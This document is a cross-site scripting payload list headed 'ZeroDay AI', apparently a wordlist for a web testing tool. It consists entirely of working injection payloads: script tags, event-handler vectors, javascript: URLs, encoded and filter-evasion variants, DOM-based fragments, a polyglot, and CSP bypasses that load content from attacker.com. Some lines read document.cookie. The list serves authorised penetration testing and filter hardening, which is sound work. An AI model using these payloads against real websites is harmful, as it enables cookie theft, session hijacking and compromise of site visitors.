# XSS Payloads — ZeroDay AI
# ─────────────────────────────

# Basic
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</script><script>alert(1)</script>
<script>alert`1`</script>
<script>(alert)(1)</script>
<script>a=alert,a(1)</script>
<script>top['al'+'ert'](1)</script>
<script>self['al'+'ert'](1)</script>
<script>window['al'+'ert'](1)</script>
<script>globalThis['al'+'ert'](1)</script>
<script>setTimeout('alert(1)')</script>
<script>setInterval('alert(1)')</script>

# Event handlers
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<input/autofocus/onfocus=alert(1)>
<select/autofocus/onfocus=alert(1)>
<textarea/autofocus/onfocus=alert(1)>
<details/open/ontoggle=alert(1)>
<video src=1/onerror=alert(1)>
<audio src=1/onerror=alert(1)>
<iframe srcdoc="<script>alert(1)</script>">
<svg/onload=eval(atob('YWxlcnQoMSk='))>
<svg/onload=fetch('//'+document.domain)>
<math><mtext><option><annotation><img src=x onerror=alert(1)>
<xss onafterscriptexecute=alert(1)><script>1</script>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><set attributeName=onmouseover value=alert(1)>
<svg><image href="javascript:alert(1)">

# Javascript protocol
javascript:alert(1)
javascript:alert(document.cookie)
<a href="javascript:alert(1)">click</a>
<iframe src="javascript:alert(1)">

# Without parentheses
<svg/onload=alert`1`>
<img src=x onerror=alert`1`>

# Encoded
&lt;script&gt;alert(1)&lt;/script&gt;
%3Cscript%3Ealert(1)%3C/script%3E
\x3cscript\x3ealert(1)\x3c/script\x3e
&#60;script&#62;alert(1)&#60;/script&#62;
<scr<script>ipt>alert(1)</scr</script>ipt>

# DOM-based
#<script>alert(1)</script>
#"><img src=x onerror=alert(1)>

# CSP bypass
<base href="https://attacker.com/">
<link rel="import" href="//attacker.com/evil.html">
<script src="data:,alert(1)"></script>

# Polyglots
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
